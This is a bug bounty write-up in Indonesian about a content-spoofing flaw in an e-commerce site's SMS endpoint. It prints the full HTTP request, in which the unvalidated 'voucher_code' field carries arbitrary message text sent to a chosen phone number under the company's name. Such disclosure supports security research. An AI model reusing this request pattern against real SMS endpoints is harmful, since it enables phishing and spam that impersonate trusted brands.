Bug Bounty Program : Bug Content Spoofing Lead to SMS Social Engineering

Bug kali ini yang saya temukan di salah satu e-commerce indonesia adalah “Bug Content Spoofing Lead to SMS Social Engineering”. Mungkin domain, endpoint, dan gambar akan saya sensor karna saya belum memiliki ijin untuk mempublikasikan nya, Kenapa tidak meminta ijin bang? sayangnya email saya tentang ijin untuk membuat writeup sudah sekitar 9 bulan tidak di balas dan nama saya pun belum masuk dalam wall of fame mereka…. 😢

Oke sekilas tentang bug yang saya temukan, jadi saya bisa mengirimkan pesan SMS apa saja dengan menggunakan no dan mengatasnamakan e-commerce tsb, menarik bukan? bisa mengirim pesan dengan nama dan no salah satu e-commerce terbesar di indoneisa, effek nya bisa di manfaatkan juga oleh penyerang untuk melakukan social engineering seperti phising, sms spam dll.

Url : api.redacted.com

Endpoin : /_redacted/redacted/download-apps

POST /_redacted/redacted/download-apps HTTP/1.1
Host: api.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: bearer d0dfe8457b446543c86260a5e4dde3a9f92ac95a2d0b5c7d0825e987392df0d8
X-Request-Id: 11de582c-4017-6bf9-e682-39458558a181
Content-Length: 133
Origin: https://www.redacted.com
Connection: close
Referer: https://www.redacted.com/promo/beli-game-voucher-game?from=promo

{"phone_number":"NO TARGET","source":"gpro_644_promo_detail","voucher_code":"ISI SMS","request_id":"11de582c-4017-6bf9-e682-39458558a181"}

Karena tidak ada validasi pada parameter “voucher_code” jadi kita bisa merubah value dari voucher code dan memasukan pesan yang ingin kita kirim, contoh nya :

Time Line :

  • 19 Des 2019 19.43 - Send Report
  • 20 Des 2019 10.02 - Bug dinyatakan valid dengan severity-level P4-P3
  • 23 Jan 2020 14.49 - Reward diterima Rp. x.xxx.xxx

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store